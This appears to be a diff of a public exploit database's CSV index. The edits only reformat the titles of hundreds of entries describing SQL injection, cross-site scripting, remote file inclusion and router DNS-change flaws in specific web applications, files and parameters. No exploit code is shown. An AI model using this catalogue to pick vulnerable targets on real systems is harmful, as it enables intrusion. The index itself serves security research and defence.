-28347,platforms/php/webapps/28347.txt,"XennoBB 2.1 - profile.php Multiple SQL Injection",2006-08-07,"Chris Boulton",php,webapps,0 +28347,platforms/php/webapps/28347.txt,"XennoBB 2.1 - 'profile.php' Multiple SQL Injections",2006-08-07,"Chris Boulton",php,webapps,0 28349,platforms/php/webapps/28349.txt,"TurnkeyWebTools PHP Simple Shop 2.0 - Multiple Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0 28350,platforms/php/webapps/28350.txt,"VWar 1.5 - war.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 28351,platforms/php/webapps/28351.txt,"VWar 1.5 - member.php vwar_root Parameter Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 @@ -30163,7 +30174,7 @@ id,file,description,date,author,platform,type,port 28403,platforms/php/webapps/28403.txt,"Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0 28404,platforms/php/webapps/28404.txt,"Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0 -28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - 'index.php onlyforuser Parameter' SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 +28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - 'index.php' 'onlyforuser' Parameter SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 28410,platforms/php/webapps/28410.txt,"Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Parameter Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site - Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay - 'index.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 @@ -30364,7 +30375,7 @@ id,file,description,date,author,platform,type,port 28696,platforms/php/webapps/28696.txt,"CubeCart 3.0.x - view_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 28697,platforms/php/webapps/28697.txt,"CubeCart 3.0.x - view_doc.php view_doc Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 28698,platforms/php/webapps/28698.txt,"CubeCart 3.0.x - admin/print_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 -28699,platforms/php/webapps/28699.txt,"CubeCart 3.0.x - /admin/print_order.php order_id Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 +28699,platforms/php/webapps/28699.txt,"CubeCart 3.0.x - '/admin/print_order.php' 'order_id' Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28652,platforms/hardware/webapps/28652.txt,"Asus RT-N66U 3.0.0.4.374_720 - Cross-Site Request Forgery",2013-09-30,cgcai,hardware,webapps,80 28653,platforms/linux/webapps/28653.txt,"mod_accounting Module 0.5 - Blind SQL Injection",2013-09-30,Wireghoul,linux,webapps,0 28654,platforms/php/webapps/28654.txt,"XAMPP 1.8.1 - 'lang.php WriteIntoLocalDisk method' Local Write Access",2013-09-30,"Manuel García Cárdenas",php,webapps,80 @@ -30394,10 +30405,10 @@ id,file,description,date,author,platform,type,port 28691,platforms/php/webapps/28691.txt,"Quickblogger 1.4 - Remote File Inclusion",2006-09-25,You_You,php,webapps,0 28692,platforms/php/webapps/28692.txt,"Phoenix Evolution CMS - 'index.php' Multiple Parameter Cross-Site Scripting",2006-09-26,Root3r_H3ll,php,webapps,0 28693,platforms/php/webapps/28693.txt,"Phoenix Evolution CMS - modules/pageedit/index.php pageid Parameter Cross-Site Scripting",2006-09-26,Root3r_H3ll,php,webapps,0 -28701,platforms/php/webapps/28701.txt,"CubeCart 3.0.x - /admin/nav.php Multiple Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 -28702,platforms/php/webapps/28702.txt,"CubeCart 3.0.x - /admin/image.php image Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 -28703,platforms/php/webapps/28703.txt,"CubeCart 3.0.x - /admin/header.inc.php Multiple Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 -28704,platforms/php/webapps/28704.txt,"CubeCart 3.0.x - /footer.inc.php la_pow_by Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 +28701,platforms/php/webapps/28701.txt,"CubeCart 3.0.x - '/admin/nav.php' Multiple Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 +28702,platforms/php/webapps/28702.txt,"CubeCart 3.0.x - '/admin/image.php' 'image' Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 +28703,platforms/php/webapps/28703.txt,"CubeCart 3.0.x - '/admin/header.inc.php' Multiple Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 +28704,platforms/php/webapps/28704.txt,"CubeCart 3.0.x - '/footer.inc.php' 'la_pow_by' Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28729,platforms/php/webapps/28729.txt,"phpBB XS 0.58 - Multiple Remote File Inclusion",2006-09-30,xoron,php,webapps,0 28730,platforms/php/webapps/28730.txt,"OlateDownload 3.4 - details.php page Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Inclusion",2006-09-28,D_7J,php,webapps,0 @@ -30443,7 +30454,7 @@ id,file,description,date,author,platform,type,port 28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 - admin/zones.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28761,platforms/php/webapps/28761.txt,"WikyBlog 1.2.x - 'index.php' Remote File Inclusion",2006-10-05,MoHaNdKo,php,webapps,0 28762,platforms/asp/webapps/28762.txt,"Civica - Display.asp SQL Injection",2006-10-05,CodeXpLoder'tq,asp,webapps,0 -28767,platforms/php/webapps/28767.txt,"AckerTodo 4.2 - 'login.php' Multiple SQL Injection",2006-10-06,"Francesco Laurita",php,webapps,0 +28767,platforms/php/webapps/28767.txt,"AckerTodo 4.2 - 'login.php' Multiple SQL Injections",2006-10-06,"Francesco Laurita",php,webapps,0 28768,platforms/asp/webapps/28768.html,"Emek Portal 2.1 - Uyegiris.asp SQL Injection",2006-10-06,"Dj ReMix",asp,webapps,0 28769,platforms/php/webapps/28769.txt,"Interspire FastFind - 'index.php' Cross-Site Scripting",2006-09-27,MizoZ,php,webapps,0 28770,platforms/php/webapps/28770.txt,"Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection",2006-10-08,disfigure,php,webapps,0 @@ -30598,7 +30609,7 @@ id,file,description,date,author,platform,type,port 28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28967,platforms/php/webapps/28967.txt,"ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0 28970,platforms/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80 -28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php sondage Parameter' SQL Injection",2013-10-15,drone,php,webapps,80 +28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php' 'sondage' Parameter SQL Injection",2013-10-15,drone,php,webapps,80 28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",unix,webapps,0 28975,platforms/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0 28976,platforms/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - File Inclusion",2013-10-15,Vulnerability-Lab,ios,webapps,0 @@ -30617,7 +30628,7 @@ id,file,description,date,author,platform,type,port 28992,platforms/asp/webapps/28992.txt,"INFINICART - browse_group.asp groupid Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 40373,platforms/cgi/webapps/40373.sh,"ASUS DSL-X11 ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 28993,platforms/asp/webapps/28993.txt,"INFINICART - added_to_cart.asp ProductID Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 -28994,platforms/asp/webapps/28994.txt,"INFINICART - browsesubcat.asp Multiple Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 +28994,platforms/asp/webapps/28994.txt,"INFINICART - 'browsesubcat.asp' Multiple Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0 28995,platforms/php/webapps/28995.txt,"WebTester 5.x - Multiple Vulnerabilities",2013-10-16,X-Cisadane,php,webapps,80 29151,platforms/asp/webapps/29151.txt,"Link Exchange Lite 1.0 - Multiple SQL Injections",2006-11-21,"laurent gaffie",asp,webapps,0 29152,platforms/asp/webapps/29152.txt,"JiRos Link Manager 1.0 - openlink.asp LinkID Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 @@ -30639,7 +30650,7 @@ id,file,description,date,author,platform,type,port 29011,platforms/asp/webapps/29011.txt,"ASPIntranet 2.1 - default.asp SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 29012,platforms/asp/webapps/29012.txt,"DMXReady Site Engine Manager 1.0 - index.asp SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 29013,platforms/asp/webapps/29013.txt,"Pilot Cart 7.2 - Pilot.asp SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 -29014,platforms/asp/webapps/29014.txt,"Car Site Manager - csm/asp/listings.asp Multiple Parameter SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 +29014,platforms/asp/webapps/29014.txt,"Car Site Manager - 'csm/asp/listings.asp' Multiple Parameter SQL Injections",2006-11-14,"laurent gaffie",asp,webapps,0 29015,platforms/asp/webapps/29015.txt,"Car Site Manager - csm/asp/detail.asp p Parameter SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 29016,platforms/asp/webapps/29016.txt,"Car Site Manager - csm/asp/listings.asp Multiple Parameter Cross-Site Scripting",2006-11-14,"laurent gaffie",asp,webapps,0 29017,platforms/php/webapps/29017.txt,"Plesk 7.5/8.0 - get_password.php Cross-Site Scripting",2006-11-14,"David Vieira-Kurz",php,webapps,0 @@ -30663,8 +30674,8 @@ id,file,description,date,author,platform,type,port 29041,platforms/asp/webapps/29041.txt,"Yetihost Helm 3.2.10 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-15,"Aria-Security Team",asp,webapps,0 29042,platforms/asp/webapps/29042.txt,"Dragon Internet Events Listing 2.0.01 - venue_detail.asp VenueID Parameter SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 29043,platforms/asp/webapps/29043.txt,"Dragon Internet Events Listing 2.0.01 - event_searchdetail.asp ID Parameter SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 -29044,platforms/asp/webapps/29044.txt,"Dragon Internet Events Listing 2.0.01 - admin_login.asp Multiple Field SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 -29046,platforms/asp/webapps/29046.txt,"ASPIntranet 2.1 - Multiple SQL Injection",2006-11-15,"Aria-Security Team",asp,webapps,0 +29044,platforms/asp/webapps/29044.txt,"Dragon Internet Events Listing 2.0.01 - 'admin_login.asp' Multiple Field SQL Injections",2006-11-15,"Benjamin Moss",asp,webapps,0 +29046,platforms/asp/webapps/29046.txt,"ASPIntranet 2.1 - Multiple SQL Injections",2006-11-15,"Aria-Security Team",asp,webapps,0 29047,platforms/php/webapps/29047.txt,"Hot Links - Perl PHP Information Disclosure",2006-11-15,hack2prison,php,webapps,0 29048,platforms/asp/webapps/29048.txt,"i-Gallery 3.4 - igallery.asp Multiple Parameter Cross-Site Scripting",2006-11-16,"Aria-Security Team",asp,webapps,0 29049,platforms/php/webapps/29049.txt,"BlogTorrent Preview 0.92 - Announce.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 @@ -30672,7 +30683,7 @@ id,file,description,date,author,platform,type,port 29051,platforms/php/webapps/29051.txt,"Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,the_Edit0r,php,webapps,0 41035,platforms/php/webapps/41035.txt,"Airbnb Clone Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0 29053,platforms/asp/webapps/29053.txt,"Image Gallery with Access Database - dispimage.asp id Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 -29054,platforms/asp/webapps/29054.txt,"Image Gallery with Access Database - default.asp Multiple Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 +29054,platforms/asp/webapps/29054.txt,"Image Gallery with Access Database - 'default.asp' Multiple Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 29058,platforms/php/webapps/29058.txt,"phpMyAdmin 2.x - db_create.php db Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 29059,platforms/php/webapps/29059.txt,"phpMyAdmin 2.x - db_operations.php Multiple Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 29060,platforms/php/webapps/29060.txt,"phpMyAdmin 2.x - querywindow.php Multiple Parameter Cross-Site Scripting",2006-09-15,"laurent gaffie",php,webapps,0 @@ -30691,9 +30702,9 @@ id,file,description,date,author,platform,type,port 29074,platforms/asp/webapps/29074.txt,"20/20 Real Estate 3.2 - Multiple SQL Injections",2006-11-17,"laurent gaffie",asp,webapps,0 29075,platforms/asp/webapps/29075.txt,"20/20 Auto Gallery 3.2 - Multiple SQL Injections",2006-11-17,"laurent gaffie",asp,webapps,0 29077,platforms/asp/webapps/29077.txt,"20/20 Applications Data Shed 1.0 - f-email.asp itemID Parameter SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 -29078,platforms/asp/webapps/29078.txt,"20/20 Applications Data Shed 1.0 - listings.asp Multiple Parameter SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 +29078,platforms/asp/webapps/29078.txt,"20/20 Applications Data Shed 1.0 - 'listings.asp' Multiple Parameter SQL Injections",2006-11-17,"laurent gaffie",asp,webapps,0 29079,platforms/php/webapps/29079.txt,"vBulletin 3.6.x - Admin Control Panel index.php Multiple Cross-Site Scripting Vulnerabilities",2006-11-17,insanity,php,webapps,0 -29080,platforms/asp/webapps/29080.txt,"BestWebApp Dating Site Login Component - Multiple Field SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 +29080,platforms/asp/webapps/29080.txt,"BestWebApp Dating Site Login Component - Multiple Field SQL Injections",2006-11-17,"laurent gaffie",asp,webapps,0 29081,platforms/asp/webapps/29081.txt,"BestWebApp Dating Site - login_form.asp msg Parameter Cross-Site Scripting",2006-11-17,"laurent gaffie",asp,webapps,0 29085,platforms/asp/webapps/29085.txt,"Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection (1)",2006-11-18,"laurent gaffie",asp,webapps,0 29084,platforms/asp/webapps/29084.txt,"A-Cart Pro 2.0 - product.asp ProductID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 @@ -30704,27 +30715,27 @@ id,file,description,date,author,platform,type,port 29091,platforms/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution (Remote Code Execution)",2013-10-20,"Halim Cruzito",php,webapps,0 29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - search.asp search Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0 29211,platforms/php/webapps/29211.txt,"WordPress Theme Curvo - Cross-Site Request Forgery / Arbitrary File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0 -29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds - ad.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29118,platforms/asp/webapps/29118.txt,"Enthrallweb eClassifieds - 'ad.asp' Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29093,platforms/asp/webapps/29093.txt,"Texas Rankem - 'selPlayer' Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 29094,platforms/asp/webapps/29094.txt,"Texas Rankem - 'tournament_id' Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0 29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 - list.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0 40372,platforms/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12 / CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0 -29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - /admin/admincore.php msg Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 -29099,platforms/php/webapps/29099.txt,"BirdBlog 1.4 - /admin/comments.php month Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 -29100,platforms/php/webapps/29100.txt,"BirdBlog 1.4 - /admin/entries.php month Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 -29101,platforms/php/webapps/29101.txt,"BirdBlog 1.4 - /admin/logs.php page Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 +29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - '/admin/admincore.php' 'msg' Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 +29099,platforms/php/webapps/29099.txt,"BirdBlog 1.4 - '/admin/comments.php' 'month' Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 +29100,platforms/php/webapps/29100.txt,"BirdBlog 1.4 - '/admin/entries.php' 'month' Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 +29101,platforms/php/webapps/29101.txt,"BirdBlog 1.4 - '/admin/logs.php' 'page' Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0 29103,platforms/asp/webapps/29103.txt,"vSpin Classified System 2004 - cat.asp cat Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29104,platforms/asp/webapps/29104.txt,"vSpin Classified System 2004 - search.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29105,platforms/asp/webapps/29105.txt,"vSpin Classified System 2004 - cat.asp catname Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 29106,platforms/asp/webapps/29106.txt,"vSpin Classified System 2004 - search.asp minprice Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 -29107,platforms/asp/webapps/29107.txt,"Grandora Rialto 1.6 - /admin/default.asp Multiple Field SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29107,platforms/asp/webapps/29107.txt,"Grandora Rialto 1.6 - '/admin/default.asp' Multiple Field SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29108,platforms/asp/webapps/29108.txt,"Grandora Rialto 1.6 - listfull.asp ID Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29109,platforms/asp/webapps/29109.txt,"Grandora Rialto 1.6 - listmain.asp cat Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29110,platforms/asp/webapps/29110.txt,"Grandora Rialto 1.6 - printmain.asp ID Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29111,platforms/asp/webapps/29111.txt,"Grandora Rialto 1.6 - searchkey.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29112,platforms/asp/webapps/29112.txt,"Grandora Rialto 1.6 - searchmain.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29113,platforms/asp/webapps/29113.txt,"Grandora Rialto 1.6 - searchoption.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29111,platforms/asp/webapps/29111.txt,"Grandora Rialto 1.6 - 'searchkey.asp' Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29112,platforms/asp/webapps/29112.txt,"Grandora Rialto 1.6 - 'searchmain.asp' Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29113,platforms/asp/webapps/29113.txt,"Grandora Rialto 1.6 - 'searchoption.asp' Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29114,platforms/asp/webapps/29114.txt,"Grandora Rialto 1.6 - listmain.asp cat Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 29115,platforms/asp/webapps/29115.txt,"Grandora Rialto 1.6 - searchkey.asp Keyword Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 29116,platforms/asp/webapps/29116.txt,"Grandora Rialto 1.6 - searchmain.asp cat Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 @@ -30732,8 +30743,8 @@ id,file,description,date,author,platform,type,port 29119,platforms/asp/webapps/29119.txt,"Enthrallweb eClassifieds - dircat.asp cid Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29120,platforms/asp/webapps/29120.txt,"Enthrallweb eClassifieds - dirSub.asp sid Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29121,platforms/asp/webapps/29121.txt,"Enthrallweb eHomes - homeDetail.asp AD_ID Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29122,platforms/asp/webapps/29122.txt,"Enthrallweb eHomes - compareHomes.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29123,platforms/asp/webapps/29123.txt,"Enthrallweb eHomes - result.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29122,platforms/asp/webapps/29122.txt,"Enthrallweb eHomes - 'compareHomes.asp' Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29123,platforms/asp/webapps/29123.txt,"Enthrallweb eHomes - 'result.asp' Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29124,platforms/asp/webapps/29124.txt,"Enthrallweb eHomes - result.asp Multiple Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 29126,platforms/asp/webapps/29126.txt,"Gnews Publisher - Multiple SQL Injections",2006-11-20,"Aria-Security Team",asp,webapps,0 29128,platforms/php/webapps/29128.txt,"Vikingboard 0.1.2 - admin.php act Parameter Traversal Arbitrary File Access",2006-11-20,"laurent gaffie",php,webapps,0 @@ -30753,13 +30764,13 @@ id,file,description,date,author,platform,type,port 29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - Weblog.php Cross-Site Scripting",2006-11-21,the_Edit0r,php,webapps,0 29217,platforms/php/webapps/29217.txt,"CuteNews 1.3.6 - 'result' Parameter Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 - 'Link_Temp.php' Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 -29219,platforms/asp/webapps/29219.txt,"DUdownload 1.0/1.1 - detail.asp Multiple Parameter SQL Injection",2006-12-02,"Aria-Security Team",asp,webapps,0 +29219,platforms/asp/webapps/29219.txt,"DUdownload 1.0/1.1 - 'detail.asp' Multiple Parameter SQL Injections",2006-12-02,"Aria-Security Team",asp,webapps,0 29220,platforms/asp/webapps/29220.html,"Metyus Okul Yonetim 1.0 - Sistemi Uye_giris_islem.asp SQL Injection",2006-12-04,ShaFuck31,asp,webapps,0 29165,platforms/php/webapps/29165.txt,"PMOS Help Desk 2.3 - ticketview.php Multiple Parameter Cross-Site Scripting",2006-11-22,SwEET-DeViL,php,webapps,0 29166,platforms/php/webapps/29166.txt,"PMOS Help Desk 2.3 - ticket.php email Parameter Cross-Site Scripting",2006-11-22,SwEET-DeViL,php,webapps,0 29992,platforms/php/webapps/29992.txt,"Campsite 2.6.1 - SubscriptionSection.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29993,platforms/php/webapps/29993.txt,"Campsite 2.6.1 - SystemPref.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29216,platforms/asp/webapps/29216.html,"Aspee Ziyaretci Defteri - giris.asp Multiple Field SQL Injection",2006-12-01,ShaFuq31,asp,webapps,0 +29216,platforms/asp/webapps/29216.html,"Aspee Ziyaretci Defteri - giris.asp Multiple Field SQL Injections",2006-12-01,ShaFuq31,asp,webapps,0 29173,platforms/php/webapps/29173.txt,"Active PHP BookMarks 1.1.2 - Multiple Remote File Inclusion",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps,0 29174,platforms/asp/webapps/29174.txt,"MidiCart ASP - Item_Show.asp ID2006quant Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29175,platforms/php/webapps/29175.txt,"Simple PHP Gallery 1.1 - System SP_Index.php Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps,0 @@ -30777,7 +30788,7 @@ id,file,description,date,author,platform,type,port 29187,platforms/php/webapps/29187.txt,"cPanel WebHost Manager 3.1 - dofeaturemanager feature Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 29188,platforms/php/webapps/29188.txt,"cPanel WebHost Manager 3.1 - park ndomain Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 29189,platforms/asp/webapps/29189.txt,"fipsShop - Multiple SQL Injections",2006-11-25,"Aria-Security Team",asp,webapps,0 -29191,platforms/asp/webapps/29191.txt,"ClickContact - default.asp Multiple SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 +29191,platforms/asp/webapps/29191.txt,"ClickContact - 'default.asp' Multiple SQL Injections",2006-11-27,"Aria-Security Team",asp,webapps,0 29192,platforms/asp/webapps/29192.txt,"Clickblog - Displaycalendar.asp SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29193,platforms/asp/webapps/29193.txt,"Click Gallery - Multiple Input Validation Vulnerabilities",2006-11-27,"Aria-Security Team",asp,webapps,0 29195,platforms/asp/webapps/29195.txt,"uPhotoGallery 1.1 - Slideshow.asp ci Parameter SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 @@ -30792,7 +30803,7 @@ id,file,description,date,author,platform,type,port 29205,platforms/php/webapps/29205.txt,"Invision Gallery 2.0.7 - 'index.php' IMG Parameter SQL Injection",2006-12-01,infection,php,webapps,0 29262,platforms/hardware/webapps/29262.pl,"Pirelli Discus DRG A125g - Password Disclosure",2013-10-28,"Sebastián Magof",hardware,webapps,0 29207,platforms/php/webapps/29207.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Show Parameter SQL Injection",2006-12-01,"Tim Weber",php,webapps,0 -29231,platforms/asp/webapps/29231.txt,"Dol Storye - Dettaglio.asp Multiple SQL Injection",2006-12-06,WarGame,asp,webapps,0 +29231,platforms/asp/webapps/29231.txt,"Dol Storye - 'Dettaglio.asp' Multiple SQL Injections",2006-12-06,WarGame,asp,webapps,0 29232,platforms/php/webapps/29232.txt,"Link CMS - navigacija.php IDMeniGlavni Parameter SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 29233,platforms/php/webapps/29233.txt,"Link CMS - prikazInformacije.php IDStranicaPodaci Parameter SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 29223,platforms/php/webapps/29223.txt,"Inside Systems Mail 2.0 - error.php Cross-Site Scripting",2006-12-04,"Vicente Aguilera Diaz",php,webapps,0 @@ -30861,7 +30872,7 @@ id,file,description,date,author,platform,type,port 29330,platforms/php/webapps/29330.txt,"WordPress Theme Switchblade 1.3 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0 29331,platforms/php/webapps/29331.txt,"ImpressPages CMS 3.6 - manage() Function Remote Code Execution",2013-11-01,LiquidWorm,php,webapps,0 29332,platforms/php/webapps/29332.txt,"WordPress Theme Think Responsive 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0 -29333,platforms/asp/webapps/29333.txt,"Efkan Forum 1.0 - Grup Variable SQL Injection",2006-12-22,ShaFuq31,asp,webapps,0 +29333,platforms/asp/webapps/29333.txt,"Efkan Forum 1.0 - 'Grup' Parameter SQL Injection",2006-12-22,ShaFuq31,asp,webapps,0 40370,platforms/cgi/webapps/40370.sh,"PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 29334,platforms/cfm/webapps/29334.txt,"Future Internet - index.cfm Multiple Parameter SQL Injection",2006-12-23,Linux_Drox,cfm,webapps,0 29335,platforms/cfm/webapps/29335.txt,"Future Internet - index.cfm categoryId Parameter Cross-Site Scripting",2006-12-23,Linux_Drox,cfm,webapps,0 @@ -30909,10 +30920,10 @@ id,file,description,date,author,platform,type,port 29385,platforms/asp/webapps/29385.txt,"Kolayindir Download - down.asp SQL Injection",2007-01-05,ShaFuck31,asp,webapps,0 